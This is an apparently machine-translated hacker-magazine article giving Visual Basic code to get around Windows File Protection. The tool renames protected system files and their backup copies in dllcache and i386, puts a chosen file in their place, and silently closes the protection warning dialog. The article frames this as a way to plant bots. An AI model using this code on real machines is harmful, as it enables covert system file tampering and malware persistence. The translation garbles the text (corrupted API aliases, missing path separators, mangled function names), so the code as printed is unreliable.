Windows File Protection is so vulnerable

Author: smallras... Source: Hacker defense

I read the Windows File Protection so vulnerable strategy article (hereinafter referred to as "strategy"). I want to try it myself, but I am afraid that the dialog box will break down our good news, how is it good? Read this article!

"Destruction" Ideology
Let's talk about the idea first. If you have the idea, everything can be done well. Note the title of the dialog box in "Introduction". Is it "Windows File Protection. Let's start with it. There are two methods. One is to search for the window title and hide it after finding it. This can be done through the ShowWindow API and SW_HIDE messages, but after all, the window still exists, which is not very secure. The second method is also based on the title of the window. After the window is found, it is not hidden, but directly closed by sending system messages. The following is an example of replacing a complete file and closing the dialog box. Select the second method.

Interface Design
Well, we should first give the layout of each control and its corresponding properties.

Initialization
Initialization is of course the first thing to do with the program. Here, you need to declare the required APIs, constants, and variables, and obtain the complete path of the Windows directory.
Obtain the API of the WINDOWS installation directory
Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Query the window handle API
Private Declare Function FindWindow Lib "user32" Alias "find0000wa" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Close the API of the specified window according to the handle
Private Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Close the constant of the window
Private Const WM_QUIT = & H12
Store Windows directory Variables
Dim WindowsDirectory As String

Private Sub Form_Load ()
Store the string buffer of the obtained Windows Directory
Dim Path As String
Set the buffer content to break down the full path of the Windows directory
Path = Space (255)
Obtain the path of the Windows directory and store it in the buffer zone.
Call GetWindowsDirectory (Path, 255)
Break down the full path of the Windows directory
Windows Directory = Mid (Path, 1, InStr (1, Path, "")-2)
Specify the complete path and file name of the replaced File
TxtSource. Text = WindowsDirectory & "&" notepad.exe"
Specify the complete path and file name of the replaced File
TxtDestination = WindowsDirectory & "&" regedit.exe"
End Sub
Then begin the file replacement process. Determine whether the specified file to be replaced exists or not. If yes, replace it with the path selected by the check box. The idea here is to rename all the files, there is no way to recover it, and then copy the replacement file to the replaced file, which avoids the possibility of unexpected situations due to direct replacement. After replacement, activate the timer and search for the dialog box.
Private Sub into do_click ()
All operation objects are blocked during execution to prevent program crashes due to misoperations.
Required do. Enabled = False: txtSource. Enabled = False: txtDestination. Enabled = False
ChkWindows. Enabled = False: chkSystem32.Enabled = False: chkDllcache. Enabled = False: chkI386.Enabled = False
Set the error trap because the following program involves File Operations
On Error Resume Next
Determine whether the replaced file exists or not
If Dir (txtSource. Text) <> "And Dir (txtDestination. Text) <>" Then
Yes. It defines the file name of the replaced file to store the variable.
Dim FileName As String
Get the name of the replaced File
FileName = Mid (txtSource. Text, limit Rev (txtSource. Text, "") + 1, Len (txtSource. Text)-limit Rev (txtSource. Text ,""))
Determine whether to select the Dllcache check box
If chkDllcache. Value = 1 Then
Yes, rename the replaced file in Dllcache
Name WindowsDirectory & "system32dllcache" & FileName As WindowsDirectory & "system32dllcache" & FileName & ". bak"
End If
Check whether System32 is selected
If chkSystem32.Value = 1 Then
Yes. Rename the replaced file in System32.
Name WindowsDirectory & "system32" & FileName As WindowsDirectory & "system32" & FileName & ". bak"
End If
Check whether I386 is selected
If chkI386.Value = 1 Then
Yes, rename the replaced file under I386
Name WindowsDirectory & "ServicePackFilesi386" & FileName As WindowsDirectory & "ServicePackFilesi386" & FileName & ". bak"
End If
Determine whether to select the Windows check box
If chkWindows. Value = 1 Then
Yes. Change the name of the replaced file in Windows.
Name WindowsDirectory & "& FileName As WindowsDirectory &" & FileName & ". bak"
End If
Copy a replacement file to a replacement File
FileCopy txtDestination. Text, txtSource. Text
Activate Timer
TimCheck. Enabled = True
End If
End Sub
The last step is to constantly monitor the "Windows File Protection" dialog box, and send WM_QUIT system messages to it through the PostMessage API as soon as it comes out, closing it. Note that PostMessage is used instead of SendMessage, mainly because the message does not need to be waited. If the latter is used, the dialog box in "Introduction" cannot be closed. Instead, another dialog box is displayed.
Private Sub timCheck_Timer ()
Set error traps
On Error Resume Next
Defines variables for storing the "Windows File Protection" window handle
Dim hwnd As Long
Find the "Windows File Protection" window and store the corresponding handle to the variable
Hwnd = FindWindow (vbNullString, "Windows File Protection ")
Determine whether a window is found
If hwnd <> 0 Then
Yes. Close the window.
Call PostMessage (hwnd, WM_QUIT, 0, 0)
Success prompt
MsgBox "replaced successfully! ", VbInformation
Exit Program
End
End If
End Sub
Now we can compile and use it.

Conclusion
In this way, the WFP with strong MS Security has been broken through in a few simple steps, and I cannot believe it myself. But this is a fact, so do not believe it. A "small" hole + a weapon = A Lot Of bots, I believe you will never miss it. Leave a BLOG. You are always welcome. Http://smallrascal.blog.tom.com